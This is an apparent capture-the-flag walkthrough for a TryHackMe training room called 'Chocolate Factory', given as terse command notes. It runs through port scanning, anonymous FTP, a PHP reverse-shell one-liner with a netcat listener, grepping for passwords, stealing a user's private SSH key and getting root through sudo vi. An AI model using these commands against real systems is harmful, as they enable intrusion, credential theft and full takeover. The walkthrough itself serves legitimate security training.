Chocolate Factory

Room Link: https://tryhackme.com/room/chocolatefactory

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/21 - FTP

Kali

ftp $VICTIM
Username: anonymous
>binary
>passive
>mget *

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

We can run commands here and we see the key_rev_key file

We go there by the url and we can download it

Kali

strings key_rev_key

Web Shell

Web

php -r '$sock=fsockopen("$KALI",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Kali

nc -lvp 4444

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

cd /var/www/html/
grep password *

Shell

I was not able to su into charlie with the password, the credentials did work for the web login but it just brought me to the command page.

Victim

cd /home/charlie/
cat teleport

I copied the teleport private key to kali

Kali

subl teleport 
chmod 700 teleport
ssh -i teleport charlie@$VICTIM  

Privilege Escalation

Exploit Link: https://gtfobins.github.io/gtfobins/vi/

Charlie can run vi with no passwd so I just followed the link above to become root

Victim

sudo -l
sudo vi -c ':!/bin/sh' /dev/null